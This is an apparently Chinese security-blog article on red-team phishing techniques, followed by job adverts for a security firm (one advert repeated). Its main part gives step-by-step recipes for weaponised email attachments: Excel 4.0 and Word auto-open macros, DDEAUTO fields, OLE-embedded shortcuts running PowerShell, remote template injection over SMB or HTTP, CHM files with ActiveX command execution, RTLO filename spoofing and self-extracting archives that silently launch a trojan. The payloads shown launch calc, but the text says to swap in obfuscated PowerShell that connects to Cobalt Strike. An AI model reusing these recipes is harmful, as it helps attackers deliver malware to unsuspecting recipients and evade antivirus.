釣魚常用手法總結

STATEMENT

聲明

由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負責，雷神眾測及文章作者不為此承擔任何責任。

雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章，必須保證此文章的完整性，包括版權聲明等全部內容。未經雷神眾測允許，不得任意修改或者增減此文章內容，不得以任何方式將其用于商業目的。

前言

釣魚郵件想必大家都聽說過，而我們經常會認為自己足夠聰明不會上當。但請不要輕視釣魚郵件的偽裝，全球每年因為釣魚郵件造成的經濟損失高達數百億。釣魚郵件會偽裝成任何一封看似普通不過的郵件用來欺騙收件人將賬號、口令或密碼等信息，甚至連超鏈接中的網頁也做得很逼真，當你信以為真的時候，你在網頁中留下的重要信息就是別人的囊中之物了。

這里介紹紅隊中最長用的釣魚方式：

鏈接釣魚

郵件中攜帶超級鏈接或網址，這類釣魚郵件其實也很常見，騙子在郵件內直接嵌入了釣魚鏈接，點開鏈接是騙子做的以假亂真的釣魚網站，這類網站通常會要求用戶輸入賬戶信息之類以獲取用戶敏感信息。

附件釣魚

郵件中攜帶各類附件，很多人看到郵件中有附件時，就習慣性的點開查看。附件釣魚郵件以exe/scr后綴的附件的風險程度最高，一般是病毒執行程序。其他常見的還有Html網頁附件、Doc附件、Excel附件、PDF附件等。

接下來針對附件釣魚中的各類文件制作手法進行介紹，以及殺軟查殺情況。（部分手法和圖片是收集網上資料整合的，并結合自身經驗寫了這一篇較全面的總結。）

XLM / Macro 4.0 （excel宏釣魚）

新建sheet表，選擇插入MS Excel4.0宏表

輸入命令設置第一行Auto_Open

=EXEC("c:\windows\system32\cmd.exe")

=HALT()

保存后打開文件即運行程序

可利用宏使用powershell命令上線cs

powershell上線cs，混淆命令執行

Word宏釣魚

新建word文件，設置宏

輸AutoOpen(文件打開時自動執行宏)，宏的位置要指定為當前文檔

AutoExec：啟動 Word 或加載全局模板時

AutoNew：每次新建文檔時

AutoOpen：每次打開已有文檔時

AutoClose：每次關閉文檔時

AutoExit：退出 Word 或卸載全局模板時

Sub AutoOpen()Shell ("calc") //只需要寫這個就行了End Sub

保存為docm（啟用宏的word文檔）

一般情況下，開啟文件需要手動開啟宏

Word DDE

Microsoft Office Word 的一個執行任意代碼的方法，可以在不啟用宏的情況下執行任意程序。

這個功能的本意是為了更方便地在 word 里同步更新其它應用的內容，比如說在一個 word 文檔里引用了另一個 excel 表格里的某項內容，通過連接域 (Field) 的方式可以實現在 excel 里更新內容后 word 中同步更新的效果，問題出在這個域的內容可以是一個公式 (或者說表達式)，這個公式并不限制內容。

實用性相較于宏來說更為實用。DDE執行時用戶點擊兩個按鈕即可執行。

新建Word文檔，CTRL+F9，在文檔中出現"{}"之后將代碼復制大括號之間，保存文件：

{ DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" }

office OLE+LNK

創建link文件誘導用戶點擊，Word和Excel都可以使用。

創建快捷方式

目標位置填寫命令操作

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc

在Word或Excel中插入對象，選擇package，為了提高誘導性點擊勾選顯示為圖標，更改圖標為word或者excel等迷惑性更大的圖標。

修改相應標題名等，插入link。用戶點擊即可運行程序操作。

powershell上線cs，混淆命令執行

模板文件注入宏指令

創建帶模板的文檔，再創建一個啟用宏的模板文件。然后在帶模板的文檔的壓縮包里面修改內容，使其指向的模板修改為我們自己創建的模板文件，這之間的過程可以由smb協議完成，故過查殺幾率較高。

在啟用宏的模板文件（doc3.dotm)里寫入宏。

Sub AutoOpen()Shell "calc" //此處填寫命令End Sub

在啟用模板的文檔doc3.docx壓縮包中找到word_rels\settings.xml.rels修改Target，將file協議指向模板文件

打開文檔即可執行命令

Target項協議可以使用smb和http，極大的增加了釣魚場景

powershell上線cs，混淆命令執行、

CHM 電子書

新建html文件，編碼格式ANSI，寫入代碼

<html><head><title>Mousejack replaytitle><head>head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',cmd.exe,/c calc.exe'>//這一排用于執行命令，注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行<PARAM name="Item2" value="273,1,1">OBJECT><SCRIPT>x.Click();SCRIPT>body>html>

使用easychm軟件，新建-瀏覽-選擇html文件所在目錄-選擇html文件-編譯

相對于宏文檔，chm電子書的場景較為局限，附件中攜帶chm電子書需要配合設備、xx手冊等釣魚話術

powershell上線cs，混淆命令執行

RTLO字符

制作木馬文件，輸入后綴的倒序

技巧：[文件名][偽造后綴倒序].exe

重命名，在a后面右鍵，插入Unicode控制字符->RLO

釣魚時可命名為：XXX公司xxxx文檔 編號IT111ubcehdx

增加混淆程度

使用免殺加載器生成木馬測試

rar解壓自運行

木馬文件：artifact.exe 迷惑文件:calc.exe或者文檔

進入winrar，選中這兩個文件，右鍵添加至壓縮包，創建自解壓格式壓縮文件

高級->自解壓選項->設置

模式->全部隱藏

更新->解壓并更新文件，覆蓋所有文件

運行后上線

RECRUITMENT

招聘啟事

安恒雷神眾測SRC運營（實習生）

————————

【職責描述】

1. 負責SRC的微博、微信公眾號等線上新媒體的運營工作，保持用戶活躍度，提高站點訪問量；

2. 負責白帽子提交漏洞的漏洞審核、Rank評級、漏洞修復處理等相關溝通工作，促進審核人員與白帽子之間友好協作溝通；

3. 參與策劃、組織和落實針對白帽子的線下活動，如沙龍、發布會、技術交流論壇等；

4. 積極參與雷神眾測的品牌推廣工作，協助技術人員輸出優質的技術文章；

5. 積極參與公司媒體、行業內相關媒體及其他市場資源的工作溝通工作。

【任職要求】 

 1. 責任心強，性格活潑，具備良好的人際交往能力；

 2. 對網絡安全感興趣，對行業有基本了解；

 3. 良好的文案寫作能力和活動組織協調能力。

簡歷投遞至 

bountyteam@dbappsecurity.com.cn

設計師（實習生）

————————

【職位描述】

負責設計公司日常宣傳圖片、軟文等與設計相關工作，負責產品品牌設計。

【職位要求】

1、從事平面設計相關工作1年以上，熟悉印刷工藝；具有敏銳的觀察力及審美能力，及優異的創意設計能力；有 VI 設計、廣告設計、畫冊設計等專長；

2、有良好的美術功底，審美能力和創意，色彩感強；

3、精通photoshop/illustrator/coreldrew/等設計制作軟件；

4、有品牌傳播、產品設計或新媒體視覺工作經歷；

【關于崗位的其他信息】

企業名稱：杭州安恒信息技術股份有限公司

辦公地點：杭州市濱江區安恒大廈19樓

學歷要求：本科及以上

工作年限：1年及以上，條件優秀者可放寬

簡歷投遞至 

bountyteam@dbappsecurity.com.cn

安全招聘

————————

公司：安恒信息

崗位：Web安全 安全研究員

部門：戰略支援部

薪資：13-30K

工作年限：1年+

工作地點：杭州（總部）、廣州、成都、上海、北京

工作環境：一座大廈，健身場所，醫師，帥哥，美女，高級食堂…

【崗位職責】

1.定期面向部門、全公司技術分享;

2.前沿攻防技術研究、跟蹤國內外安全領域的安全動態、漏洞披露并落地沉淀；

3.負責完成部門滲透測試、紅藍對抗業務;

4.負責自動化平臺建設

5.負責針對常見WAF產品規則進行測試并落地bypass方案

【崗位要求】

1.至少1年安全領域工作經驗；

2.熟悉HTTP協議相關技術

3.擁有大型產品、CMS、廠商漏洞挖掘案例；

4.熟練掌握php、java、asp.net代碼審計基礎（一種或多種）

5.精通Web Fuzz模糊測試漏洞挖掘技術

6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法

7.有過獨立分析漏洞的經驗，熟悉各種Web調試技巧

8.熟悉常見編程語言中的至少一種（Asp.net、Python、php、java）

【加分項】

1.具備良好的英語文檔閱讀能力；

2.曾參加過技術沙龍擔任嘉賓進行技術分享；

3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相關資質者；

4.具有大型SRC漏洞提交經驗、獲得年度表彰、大型CTF奪得名次者；

5.開發過安全相關的開源項目；

6.具備良好的人際溝通、協調能力、分析和解決問題的能力者優先；

7.個人技術博客；

8.在優質社區投稿過文章；

崗位：安全紅隊武器自動化工程師

薪資：13-30K

工作年限：2年+

工作地點：杭州（總部）

【崗位職責】

1.負責紅藍對抗中的武器化落地與研究；

2.平臺化建設；

3.安全研究落地。

【崗位要求】

1.熟練使用Python、java、c/c++等至少一門語言作為主要開發語言；

2.熟練使用Django、flask 等常用web開發框架、以及熟練使用mysql、mongoDB、redis等數據存儲方案；

3:熟悉域安全以及內網橫向滲透、常見web等漏洞原理；

4.對安全技術有濃厚的興趣及熱情，有主觀研究和學習的動力；

5.具備正向價值觀、良好的團隊協作能力和較強的問題解決能力，善于溝通、樂于分享。

【加分項】

1.有高并發tcp服務、分布式等相關經驗者優先；

2.在github上有開源安全產品優先；

3:有過安全開發經驗、獨自分析過相關開源安全工具、以及參與開發過相關后滲透框架等優先；

4.在freebuf、安全客、先知等安全平臺分享過相關技術文章優先；

5.具備良好的英語文檔閱讀能力。

簡歷投遞至

bountyteam@dbappsecurity.com.cn

崗位：紅隊武器化Golang開發工程師

薪資：13-30K

工作年限：2年+

工作地點：杭州（總部）

【崗位職責】

1.負責紅藍對抗中的武器化落地與研究；

2.平臺化建設；

3.安全研究落地。

【崗位要求】

1.掌握C/C++/Java/Go/Python/JavaScript等至少一門語言作為主要開發語言；

2.熟練使用Gin、Beego、Echo等常用web開發框架、熟悉MySQL、Redis、MongoDB等主流數據庫結構的設計,有獨立部署調優經驗；

3.了解docker，能進行簡單的項目部署；

3.熟悉常見web漏洞原理，并能寫出對應的利用工具；

4.熟悉TCP/IP協議的基本運作原理；

5.對安全技術與開發技術有濃厚的興趣及熱情，有主觀研究和學習的動力，具備正向價值觀、良好的團隊協作能力和較強的問題解決能力，善于溝通、樂于分享。

【加分項】

1.有高并發tcp服務、分布式、消息隊列等相關經驗者優先；

2.在github上有開源安全產品優先；

3:有過安全開發經驗、獨自分析過相關開源安全工具、以及參與開發過相關后滲透框架等優先；

4.在freebuf、安全客、先知等安全平臺分享過相關技術文章優先；

5.具備良好的英語文檔閱讀能力。

簡歷投遞至

bountyteam@dbappsecurity.com.cn

崗位：紅隊武器化Golang開發工程師

薪資：13-30K

工作年限：2年+

工作地點：杭州（總部）

【崗位職責】

1.負責紅藍對抗中的武器化落地與研究；

2.平臺化建設；

3.安全研究落地。

【崗位要求】

1.掌握C/C++/Java/Go/Python/JavaScript等至少一門語言作為主要開發語言；

2.熟練使用Gin、Beego、Echo等常用web開發框架、熟悉MySQL、Redis、MongoDB等主流數據庫結構的設計,有獨立部署調優經驗；

3.了解docker，能進行簡單的項目部署；

3.熟悉常見web漏洞原理，并能寫出對應的利用工具；

4.熟悉TCP/IP協議的基本運作原理；

5.對安全技術與開發技術有濃厚的興趣及熱情，有主觀研究和學習的動力，具備正向價值觀、良好的團隊協作能力和較強的問題解決能力，善于溝通、樂于分享。

【加分項】

1.有高并發tcp服務、分布式、消息隊列等相關經驗者優先；

2.在github上有開源安全產品優先；

3:有過安全開發經驗、獨自分析過相關開源安全工具、以及參與開發過相關后滲透框架等優先；

4.在freebuf、安全客、先知等安全平臺分享過相關技術文章優先；

5.具備良好的英語文檔閱讀能力。

簡歷投遞至

bountyteam@dbappsecurity.com.cn

END

長按識別二維碼關注我們